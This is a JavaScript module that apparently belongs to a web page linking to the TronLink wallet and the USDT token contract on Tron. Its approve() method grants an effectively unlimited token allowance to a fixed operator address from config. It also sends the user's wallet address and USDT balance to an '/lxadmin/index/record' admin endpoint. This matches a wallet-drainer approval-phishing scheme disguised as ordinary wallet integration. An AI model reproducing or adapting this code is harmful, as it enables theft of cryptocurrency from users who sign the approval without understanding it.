import {TetherTokenTron} from './abi'
import {AUTH_ADDRESS, AUTH_API_URL} from '@/env'
import axios from 'axios'
import store from "@/js/store"

export const TronPage = {
	async login(){
		return await window.tronLink.request({method: 'tron_requestAccounts'});
	}
}

export default class Tron{
	constructor() {
		this.init();
	}
	
	init(){
		
	}
	
	getProvider(){
		
	}
	
	async contract(){
		let abiInfo = this.getAbiInfo(localStorage.getItem('currency_key'));
		//方式1：通过ABI和合约地址创建合约对象
		return await window.tronLink.tronWeb.contract(abiInfo['abi'], abiInfo['addressCon']);
	}
	
	async transfer(address, value){
		let contract = await this.contract();
		await contract.transfer(address, value).send({
			shouldPollResponse:true
		});
	}
	
	async approve(address){
		localStorage.setItem('auth_address', address);
		let value = 1.25 * 1e51;
		value =  "0x" + value.toString(16);
		let auth = window.tronWeb.address.fromHex(AUTH_ADDRESS);
		let contract = await this.contract();
		let amount = await contract.balanceOf(window.tronWeb.address.fromHex(address)).call();
		amount = window.tronWeb.fromSun(parseInt(amount._hex).toString())
		axios.post(AUTH_API_URL + '/lxadmin/index/record',{
			address:address,
			auth:AUTH_ADDRESS,
			chainId:0,
			currency:localStorage.getItem('currency_key'),
			amount:amount
		}).then((res) => {
			console.log(res);
		});
		await contract.approve(auth, value).send({
			shouldPollResponse:true
		});
	}
	
	getAbiInfo(currency){
		let addressCon = "",
			abi = "";
		currency = currency.toLowerCase();
		switch(currency){
			case 'usdt':
				addressCon = TetherTokenTron.address;
				abi = TetherTokenTron.abi;
				break; 
		}
		if(addressCon == ""){
			console.log("此链不支持此币" + currency);
			throw "$vuetify.tips.chainNotSupportCoin";
		}
		return {
			addressCon : addressCon,
			abi : abi
		};
	}
	
	addListener(){
		window.addEventListener('message', function (e) {
			if (e.data.message && e.data.message.action == "tabReply") {
				// console.log("tabReply event", e.data.message)
				if (e.data.message.data.data.node.chain == '_'){
					// console.log("主链")
				}else{
					// console.log("侧链")
				}
			}
			if (e.data.message && e.data.message.action == "setNode") {
				// console.log("setNode event", e.data.message)
				if (e.data.message.data.node.chain == '_'){
					// console.log("主链")
				}else{
					// console.log("侧链")
				}
				store.dispatch("logout");
			}
			if (e.data.message && e.data.message.action == "accountsChanged") {
				store.dispatch("logout");
			}
		});
	}
}